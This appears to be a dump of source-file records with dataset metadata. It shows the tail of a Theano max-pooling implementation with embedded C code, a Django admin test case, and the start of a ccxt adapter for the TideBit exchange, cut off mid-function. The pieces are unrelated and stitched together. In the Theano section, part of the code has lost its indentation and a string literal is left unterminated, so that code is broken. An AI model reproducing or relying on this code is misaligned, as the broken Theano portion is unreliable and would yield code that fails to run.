                       tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ggx
        else:
            y_padded = x
            ggx_padded = ggx
        # precompute the region boundaries for each dimension
        region_ranges = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                start = j * stride[i]
                end = builtins.min(start + ws[i], img_shp[i])
                region_ranges[i].append(xrange(start, end))

        # iterate over non-pooling dimensions
        for k in np.ndindex(*x.shape[:-nd]):
            ggxk = ggx_padded[k]
            ggzk = ggz[k]
            yk = y_padded[k]
            maxoutk = maxout[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                # iterate inside region
                maxout_value = maxoutk[r]
                for c in itertools.product(*[region_ranges[i][r[i]]
                                             for i in xrange(nd)]):
                    if maxout_value == yk[c]:
                        ggzk[r] += ggxk[c]

    def infer_shape(self, node, in_shapes):
        # Output has the shape of maxout (input #1).
        return [in_shapes[1]]

    def grad(self, inp, grads):
        x, maxout, ggx, ws, stride, pad = inp
        gz, = grads
        # ws/stride/pad are integer parameters: disconnected from the cost.
        return [theano.tensor.zeros_like(x),
                theano.tensor.zeros_like(maxout),
                MaxPoolGrad(ignore_border=self.ignore_border,
                            ndim=self.ndim)(x, maxout, gz,
                                            ws, stride, pad),
                DisconnectedType()(),
                DisconnectedType()(),
                DisconnectedType()()]

    def connection_pattern(self, node):
        # Output depends on x, maxout and ggx, not on ws/stride/pad.
        return [[1], [1], [1], [0], [0], [0]]

    def c_code(self, node, name, inp, out, sub):
        """Generate the C implementation (same algorithm as perform)."""
        if self.mode != 'max':
            raise theano.gof.utils.MethodNotDefined()
        x, maxout, ggx, ws, stride, pad = inp
        z, = out  # the grad of grad
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']

        if self.openmp:
            # run in parallel over each pooling block
            # NOTE: this string literal was truncated by a comment-stripping
            # pass (it begins with '#'); restored from upstream Theano.
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, maximum) schedule(static)'
        else:
            omp_parallel = ''
        ccode = """
        int z_typenum = PyArray_ObjectType((PyObject*)%(maxout)s, 0);
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            z[i] = PyArray_DIMS(%(maxout)s)[%(non_pool_ndim)s + i];
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
        }
        // allocating memory for output, if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(z)s) || !PyArray_ISCONTIGUOUS(%(z)s)
            || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(total_ndim)s; i++)
            {
                if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(maxout)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
            Py_XDECREF(%(z)s);
            %(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(maxout)s), z_typenum,0);
        }
        else {
            PyArray_FILLWBYTE(%(z)s, 0);
        }
        dtype_%(maxout)s maximum; // temp var for maximum value in a region
        // will be used to hold start and end index of a region
        int r_st[%(nd)s];
        int r_end[%(nd)s];
        // index for iterating over the pooling regions
        int r_idx[%(nd)s];
        // placeholder for PyArray indexing (output)
        npy_intp o_idx[%(total_ndim)s];
        // placeholder for PyArray indexing (input)
        npy_intp i_idx[%(total_ndim)s];
        // loop over non-pooling dimensions
        int non_pooling_prod;
        non_pooling_prod = 1;
        for (int i=0; i<%(non_pool_ndim)s; i++)
        {
            non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
        }
        %(omp_parallel)s
        // first loop over non-pooling dimensions
        for (int t=0; t<non_pooling_prod; t++)
        {
            // compute the non-pooling index in each dimension
            if (%(non_pool_ndim)s!=0)
            {
                o_idx[0] = t;
                i_idx[0] = t;
                for (int i=1; i<%(non_pool_ndim)s; i++)
                {
                    o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                    o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                    i_idx[i] = o_idx[i];
                    i_idx[i - 1] = o_idx[i - 1];
                }
            }

            // then loop over each region in each pooling dimension
        """

        for i in xrange(nd):
            ccode += """
                for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
                  r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
                  r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
                  // skip the padding
                  r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
                  r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
                  // from padded_img space to img space
                  r_st[%(i)s] -= pd[%(i)s];
                  r_end[%(i)s] -= pd[%(i)s];
                  // use the index to find the correct position in the output
                  o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)

        ccode += """
                  dtype_%(z)s * z;
                  if (%(total_ndim)s == 4)
                  {
                    // the maximum value
                    maximum = ((dtype_%(maxout)s*)(PyArray_GETPTR4(%(maxout)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
                    // z at this position
                    z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
                  }
                  else
                  {
                    // the maximum value
                    maximum = ((dtype_%(maxout)s*)(PyArray_GetPtr(%(maxout)s,o_idx)))[0];
                    // z at this position
                    z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)));
                  }
        """
        for i in xrange(nd):
            ccode += """
                  // go through the pooled region in the unpadded input
                  for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
                  {
                    i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                    dtype_%(x)s a;
                    dtype_%(ggx)s * ggx;
                    if (%(total_ndim)s == 4)
                    {
                      a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                      ggx = ((dtype_%(ggx)s*)(PyArray_GETPTR4(%(ggx)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
                    }
                    else
                    {
                      a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                      ggx = ((dtype_%(ggx)s*)(PyArray_GetPtr(%(ggx)s,i_idx)));
                    }
                    if (a == maximum){
                      z[0] += ggx[0];
                    }
        """
        for i in xrange(nd):
            ccode += """
                  } // for loop over region
            """
        for i in xrange(nd):
            ccode += """
                } // loop over pooling dimension
            """

        ccode += """
        } // for loop over non-pooling dimensions
        """
        return ccode % locals()

    def c_code_cache_version(self):
        return (0, 4, self.openmp)
class MaxPoolRop(OpenMPOp):
__props__ = ('ignore_border', 'mode', 'ndim')
params_type = ParamsType(ignore_border=bool_t,)
    def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
        """Create a max-pooling R-op.

        Parameters
        ----------
        ignore_border : bool
            If True, partial pooling windows at the border are dropped.
        mode : str
            Must be 'max'; only max pooling is supported by this Op.
        ndim : int
            Number of pooling dimensions (the trailing dims of the input).
        openmp : bool or None
            Forwarded to OpenMPOp; controls OpenMP code generation.
        """
        super(MaxPoolRop, self).__init__(openmp=openmp)
        self.ndim = ndim
        self.ignore_border = ignore_border
        self.mode = mode
        # Only 'max' is implemented (see perform/c_code).
        assert mode == 'max'
    def make_node(self, x, eval_point, ws, stride=None, pad=None):
        """Build the Apply node for inputs (x, eval_point, ws, stride, pad).

        ``x`` is the pooling input, ``eval_point`` the R-op evaluation
        point; ``ws``/``stride``/``pad`` are 1-D integer vectors of
        length ``self.ndim``. ``stride`` defaults to ``ws`` and ``pad``
        to zeros. Non-zero padding requires ``ignore_border=True`` and
        each pad must be smaller than the corresponding window size.
        The output has ``eval_point``'s dtype.
        """
        # TODO: consider restricting the dtype?
        x = tensor.as_tensor_variable(x)
        eval_point = tensor.as_tensor_variable(eval_point)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        elif isinstance(pad, (tuple, list)):
            # These checks only apply when pad is still a concrete
            # tuple/list (not yet a symbolic variable).
            if max(pad) != 0 and not self.ignore_border:
                raise NotImplementedError(
                    'padding works only with ignore_border=True')
            if isinstance(ws, (tuple, list)):
                if any(pad[i] >= ws[i] for i in range(nd)):
                    raise NotImplementedError(
                        'padding must be smaller than strides')
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert ws.ndim == 1
        assert stride.ndim == 1
        assert pad.ndim == 1
        if x.type.ndim < nd:
            raise TypeError()
        if not ws.dtype.startswith('int'):
            raise TypeError('Pool downsample parameters must be ints.')
        if not stride.dtype.startswith('int'):
            raise TypeError('Stride parameters must be ints.')
        if not pad.dtype.startswith('int'):
            raise TypeError('Padding parameters must be ints.')
        # If the input shape are broadcastable we can have 0 in the output shape
        broad = x.broadcastable[:-nd] + (False,) * nd
        out = tensor.TensorType(eval_point.dtype, broad)
        return gof.Apply(self, [x, eval_point, ws, stride, pad], [out()])
    def perform(self, node, inp, out, params):
        """Python implementation of the max-pooling R-op.

        For each pooling region, finds the argmax of the (padded) input
        ``x`` and emits the value of the (padded) evaluation point ``ex``
        at that same position.
        """
        x, ex, ws, stride, pad = inp
        z, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'Pool requires input with {} or more dimensions'.format(nd))
        z_shape = Pool.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
        if not self.ignore_border:
            assert all(z > 0 for z in z_shape[-nd:])
        # Reuse the output buffer only when it already has the right shape.
        if (z[0] is None) or (z[0].shape != z_shape):
            z[0] = np.empty(z_shape, dtype=x.dtype)
        zz = z[0]
        # size of pooling output
        pool_out_shp = zz.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
        # NOTE(review): self.mode is asserted to be 'max' in __init__, so
        # inc_pad is always False here; kept as in the average-pool code.
        inc_pad = self.mode == 'average_inc_pad'

        # pad the image and the eval point
        if max(pad) != 0:
            y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            y[(slice(None),) * (len(x.shape) - nd) +
              tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
            ey = np.zeros(ex.shape[:-nd] + img_shp, dtype=ex.dtype)
            ey[(slice(None),) * (len(ex.shape) - nd) +
               tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ex
        else:
            y = x
            ey = ex

        # precompute the region boundaries for each dimension
        region_slices = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                start = j * stride[i]
                end = builtins.min(start + ws[i], img_shp[i])
                if not inc_pad:
                    # exclude the padding from the region
                    start = builtins.max(start, pad[i])
                    end = builtins.min(end, img_shp[i] - pad[i])
                region_slices[i].append(slice(start, end))

        # iterate over non-pooling dimensions
        for k in np.ndindex(*x.shape[:-nd]):
            zzk = zz[k]
            yk = y[k]
            eyk = ey[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                # current slice in padded input
                ykslice = yk[[region_slices[i][r[i]] for i in xrange(nd)]]
                # current slice in eval points
                eykslice = eyk[[region_slices[i][r[i]] for i in xrange(nd)]]
                # indices of maximum
                idx = np.unravel_index(np.argmax(ykslice), ykslice.shape)
                zzk[r] = eykslice[idx]
def c_headers(self):
headers = ['<algorithm>']
headers += super(MaxPoolRop, self).c_headers()
return headers
def c_code(self, node, name, inp, out, sub):
if self.mode != 'max':
raise theano.gof.utils.MethodNotDefined()
x, ex, ws, stride, pad = inp
z, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
params = sub['params']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '
else:
omp_parallel = ''
ccode = """
int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(ex)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "eval_point must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(params)s->ignore_border && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero when ignore border is False");
%(fail)s;
}
if (%(params)s->ignore_border)
{
for (int i=0; i<%(nd)s; i++)
{
// '/' in C is different from '/' in python
if (r[i] - ws[i] < 0)
{
z[i] = 0;
}
else
{
z[i] = (r[i] - ws[i]) / st[i] + 1;
}
}
}
else
{
for (int i=0; i<%(nd)s; i++)
{
// decide how many rows/cols the output has
if (st[i] >= ws[i])
{
z[i] = (r[i] - 1) / st[i] + 1;
}
else
{
z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
}
assert(z[i] > 0);
}
}
// memory allocation of z if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(non_pool_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (!mem_nec)
{
for (int i=0; i<%(nd)s; i++)
{
if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
if (%(z)s) Py_XDECREF(%(z)s);
npy_intp dims[%(total_ndim)s];
for (int i=0; i<%(non_pool_ndim)s; i++)
{
dims[i] = PyArray_DIMS(%(x)s)[i];
}
for (int i=0; i<%(nd)s; i++)
{
dims[%(non_pool_ndim)s + i] = z[i];
}
//TODO: zeros not necessary
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
}
// initialize temp var for the value in a region
dtype_%(x)s collector;
dtype_%(ex)s eval_collector;
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// handle the case where no padding, ignore border is True
if (%(params)s->ignore_border)
{
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
}
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, params=sub['params'], non_pool_ndim=non_pool_ndim)
ccode += """
// get a pointer to the correct position in the output
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
else
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
"""
for i in xrange(nd):
ccode += """
// set the first index of dimension %(i)s
i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// use the first element as the initial value of collector
if (%(total_ndim)s == 4) {
collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
eval_collector = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
} else {
collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
eval_collector = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
}
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update maximum
dtype_%(x)s a;
dtype_%(ex)s ea;
if (%(total_ndim)s == 4) {
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
ea = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
}
else {
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
ea = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
}
if (a > collector) {
collector = a;
eval_collector = ea;
}
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
ccode += """
z[0] = eval_collector;
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
    def c_code_cache_version(self):
        # Bump the leading integer whenever c_code() changes; openmp is part
        # of the key because it alters the generated source.
        return (1, self.openmp)
| true | true |
f7104a1e09cb5f5864d25354d11d833d0bfc4a7e | 1,306 | py | Python | app/core/tests/test_admin.py | rodnaskorn/recipe-app-api | a3d16d77ef51ea39d9ac433772de99f29e2fc1cd | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | rodnaskorn/recipe-app-api | a3d16d77ef51ea39d9ac433772de99f29e2fc1cd | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | rodnaskorn/recipe-app-api | a3d16d77ef51ea39d9ac433772de99f29e2fc1cd | [
"MIT"
] | null | null | null | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
    """Exercise the Django admin pages for the custom user model."""

    def setUp(self):
        """Create and log in a superuser, plus one regular user to inspect."""
        user_model = get_user_model()
        self.client = Client()
        self.admin_user = user_model.objects.create_superuser(
            email='admin@test.com',
            password='password123',
        )
        self.client.force_login(self.admin_user)
        self.user = user_model.objects.create_user(
            email='test@test.com',
            password='password123',
            name='John Smith',
        )

    def test_users_listed(self):
        """Test that users are listed on user page"""
        res = self.client.get(reverse('admin:core_user_changelist'))
        self.assertContains(res, self.user.name)
        self.assertContains(res, self.user.email)

    def test_user_change_page(self):
        """Test that the user edit page works"""
        res = self.client.get(
            reverse('admin:core_user_change', args=[self.user.id]))
        self.assertEqual(res.status_code, 200)

    def test_create_user_page(self):
        """Test that the create user page works"""
        res = self.client.get(reverse('admin:core_user_add'))
        self.assertEqual(res.status_code, 200)
| 31.095238 | 68 | 0.637825 | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
    """Tests for the Django admin integration of the custom user model."""
    def setUp(self):
        """Log in a superuser and create a regular user for the pages to show."""
        self.client = Client()
        self.admin_user = get_user_model().objects.create_superuser(
            email='admin@test.com',
            password='password123'
        )
        self.client.force_login(self.admin_user)
        self.user = get_user_model().objects.create_user(
            email='test@test.com',
            password='password123',
            name='John Smith'
        )
    def test_users_listed(self):
        """The user changelist shows the user's name and email."""
        url = reverse('admin:core_user_changelist')
        res = self.client.get(url)
        self.assertContains(res, self.user.name)
        self.assertContains(res, self.user.email)
    def test_user_change_page(self):
        """The user edit page renders with status 200."""
        url = reverse('admin:core_user_change', args=[self.user.id])
        res = self.client.get(url)
        self.assertEqual(res.status_code, 200)
    def test_create_user_page(self):
        """The add-user page renders with status 200."""
        url = reverse('admin:core_user_add')
        res = self.client.get(url)
        self.assertEqual(res.status_code, 200)
| true | true |
f7104a21aebf2e2aa07cc55c113bdba2ce69ca83 | 16,448 | py | Python | python/ccxt/tidebit.py | xeddmc/ccxt | 9ddd88e6bbc4b2162cf45d331995bb86235d2a59 | [
"MIT"
] | 1 | 2021-03-01T17:45:33.000Z | 2021-03-01T17:45:33.000Z | python/ccxt/tidebit.py | xeddmc/ccxt | 9ddd88e6bbc4b2162cf45d331995bb86235d2a59 | [
"MIT"
] | 4 | 2020-09-06T22:46:57.000Z | 2021-05-10T08:35:02.000Z | python/ccxt/tidebit.py | xeddmc/ccxt | 9ddd88e6bbc4b2162cf45d331995bb86235d2a59 | [
"MIT"
] | 1 | 2019-11-08T12:36:13.000Z | 2019-11-08T12:36:13.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import OrderNotFound
class tidebit (Exchange):
    """ccxt adapter for the TideBit (Hong Kong) exchange, REST API v2."""
    def describe(self):
        """Return the static exchange description (ids, urls, endpoints, fees)."""
        return self.deep_extend(super(tidebit, self).describe(), {
            'id': 'tidebit',
            'name': 'TideBit',
            'countries': ['HK'],
            'rateLimit': 1000,
            'version': 'v2',
            'has': {
                'fetchDepositAddress': True,
                'CORS': True,
                'fetchTickers': True,
                'fetchOHLCV': True,
                'withdraw': True,
            },
            'timeframes': {
                '1m': '1',
                '5m': '5',
                '15m': '15',
                '30m': '30',
                '1h': '60',
                '2h': '120',
                '4h': '240',
                '12h': '720',
                '1d': '1440',
                '3d': '4320',
                '1w': '10080',
            },
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/1294454/39034921-e3acf016-4480-11e8-9945-a6086a1082fe.jpg',
                'api': 'https://www.tidebit.com',
                'www': 'https://www.tidebit.com',
                'doc': [
                    'https://www.tidebit.com/documents/api/guide',
                    'https://www.tidebit.com/swagger/#/default',
                ],
                'referral': 'http://bit.ly/2IX0LrM',
            },
            'api': {
                'public': {
                    'get': [
                        'markets',
                        'tickers',
                        'tickers/{market}',
                        'timestamp',
                        'trades',
                        'trades/{market}',
                        'order_book',
                        'order',
                        'k_with_pending_trades',
                        'k',
                        'depth',
                    ],
                    'post': [],
                },
                'private': {
                    'get': [
                        'addresses/{address}',
                        'deposits/history',
                        'deposits/get_deposit',
                        'deposits/deposit_address',
                        'historys/orders',
                        'historys/vouchers',
                        'historys/accounts',
                        'historys/snapshots',
                        'linkage/get_status',
                        'members/me',
                        'order',
                        'orders',
                        'partners/orders/{id}/trades',
                        'referral_commissions/get_undeposited',
                        'referral_commissions/get_graph_data',
                        'trades/my',
                        'withdraws/bind_account_list',
                        'withdraws/get_withdraw_account',
                        'withdraws/fetch_bind_info',
                    ],
                    'post': [
                        'deposits/deposit_cash',
                        'favorite_markets/update',
                        'order/delete',
                        'orders',
                        'orders/multi',
                        'orders/clear',
                        'referral_commissions/deposit',
                        'withdraws/apply',
                        'withdraws/bind_bank',
                        'withdraws/bind_address',
                    ],
                },
            },
            'fees': {
                'trading': {
                    'tierBased': False,
                    'percentage': True,
                    'maker': 0.2 / 100,
                    'taker': 0.2 / 100,
                },
                'funding': {
                    'tierBased': False,
                    'percentage': True,
                    'withdraw': {},  # There is only 1% fee on withdrawals to your bank account.
                },
            },
            'exceptions': {
                # exchange error codes mapped to ccxt exception classes
                '2002': InsufficientFunds,
                '2003': OrderNotFound,
            },
        })
    def fetch_deposit_address(self, code, params={}):
        """Fetch the deposit address for a currency.

        NOTE(review): implicitly returns None when the response has no
        truthy 'success' field -- confirm whether callers handle that.
        """
        self.load_markets()
        currency = self.currency(code)
        request = {
            'currency': currency['id'],
        }
        response = self.privateGetDepositAddress(self.extend(request, params))
        if 'success' in response:
            if response['success']:
                address = self.safe_string(response, 'address')
                tag = self.safe_string(response, 'addressTag')
                return {
                    'currency': code,
                    'address': self.check_address(address),
                    'tag': tag,
                    'info': response,
                }
    def fetch_markets(self, params={}):
        """Fetch the list of markets and normalize them to ccxt structures."""
        response = self.publicGetMarkets(params)
        result = []
        for i in range(0, len(response)):
            market = response[i]
            id = self.safe_string(market, 'id')
            symbol = self.safe_string(market, 'name')
            # market 'name' is already of the form BASE/QUOTE
            baseId, quoteId = symbol.split('/')
            base = self.safe_currency_code(baseId)
            quote = self.safe_currency_code(quoteId)
            result.append({
                'id': id,
                'symbol': symbol,
                'base': base,
                'quote': quote,
                'baseId': baseId,
                'quoteId': quoteId,
                'info': market,
            })
        return result
    def fetch_balance(self, params={}):
        """Fetch account balances via GET members/me."""
        self.load_markets()
        response = self.privateGetMembersMe(params)
        balances = self.safe_value(response, 'accounts')
        result = {'info': balances}
        for i in range(0, len(balances)):
            balance = balances[i]
            currencyId = self.safe_string(balance, 'currency')
            code = self.safe_currency_code(currencyId)
            account = self.account()
            account['free'] = self.safe_float(balance, 'balance')
            account['used'] = self.safe_float(balance, 'locked')
            result[code] = account
        return self.parse_balance(result)
    def fetch_order_book(self, symbol, limit=None, params={}):
        """Fetch the order book for a symbol (GET depth)."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'market': market['id'],
        }
        if limit is not None:
            request['limit'] = limit  # default = 300
        request['market'] = market['id']
        response = self.publicGetDepth(self.extend(request, params))
        timestamp = self.safe_timestamp(response, 'timestamp')
        return self.parse_order_book(response, timestamp)
    def parse_ticker(self, ticker, market=None):
        """Convert an exchange ticker payload into the unified ccxt ticker."""
        # the timestamp lives on the wrapper; the prices live under 'ticker'
        timestamp = self.safe_timestamp(ticker, 'at')
        ticker = self.safe_value(ticker, 'ticker', {})
        symbol = None
        if market is not None:
            symbol = market['symbol']
        last = self.safe_float(ticker, 'last')
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': self.safe_float(ticker, 'high'),
            'low': self.safe_float(ticker, 'low'),
            'bid': self.safe_float(ticker, 'buy'),
            'ask': self.safe_float(ticker, 'sell'),
            'bidVolume': None,
            'askVolume': None,
            'vwap': None,
            'open': None,
            'close': last,
            'last': last,
            'change': None,
